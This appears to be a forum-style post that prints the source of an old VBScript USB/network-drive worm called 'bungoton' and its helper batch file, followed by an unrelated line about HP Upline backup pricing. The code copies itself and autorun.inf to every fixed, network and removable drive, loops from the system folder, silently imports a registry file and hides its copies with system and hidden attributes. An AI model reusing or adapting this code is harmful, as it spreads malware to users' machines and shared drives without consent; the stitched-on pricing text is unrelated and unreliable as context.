The malware is just a really dumb VBS that does the following with some minor variations. It is neither skillful nor a hack but an architectural weakness in Windows. Note that I am not adding in the .inf and .reg files. 

'bungoton v1.0

'bungoton City Phils

'email me if you found this :) @ bungoton@bungoton.org

'May 2007

on error resume next

Set WshShell =CreateObject("WScript.Shell")





For i=1 to 1



set Of = CreateObject("Scripting.FileSystemObject") 

set dir = Of.GetSpecialFolder(1)



Set dc = Of.Drives

if WScript.ScriptFullName=dir&"\bungoton.vbs" then

isdir=true

else

a=WshShell.Run("bungoton.bat Open" ,0,False)

isdir=false

end if



For Each d In dc 

If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then 

a=WshShell.Run("bungoton.bat - "&d ,0,True)

if isdir then

Of.CopyFile dir&"\bungoton.*",d&"\",True

Of.CopyFile dir&"\autorun.inf",d&"\",True

else

Of.CopyFile "bungoton.*",d&"\",True

Of.CopyFile "autorun.inf",d&"\",True

end if

a=WshShell.Run("bungoton.bat + "&d ,0,True)

End If

next



if isdir then

wscript.sleep 60000

i=0

else

a=WshShell.Run("bungoton.bat - "&dir ,0,True)

Of.CopyFile "bungoton.*",dir&"\",True

Of.CopyFile "autorun.inf",dir&"\",True

a=WshShell.Run("bungoton.bat + "&dir ,0,True)

end if



next


*******

@echo off

if exist .\bungoton.reg regedit /s .\bungoton.reg

if not "%1"=="" goto open

if exist bungoton.vbs start WScript.exe bungoton.vbs&exit

if exist %SYSTEMROOT%\system32\bungoton.vbs start WScript.exe %SYSTEMROOT%\system32\bungoton.vbs&exit

exit

:open

if not "%1"=="Open" goto next

start explorer .\

exit

:next

if "%1"=="+" attrib +s +a +h +r %2\bungoton.*

if "%1"=="+" attrib +s +a +h +r %2\autorun.inf

:end


HP Upline (online backup unlimited service) will cost you US$ 12.5 /mo for the family plan (total of $150 per year)

Prices can be seen at
https://www.upline.com/plans/index.shtml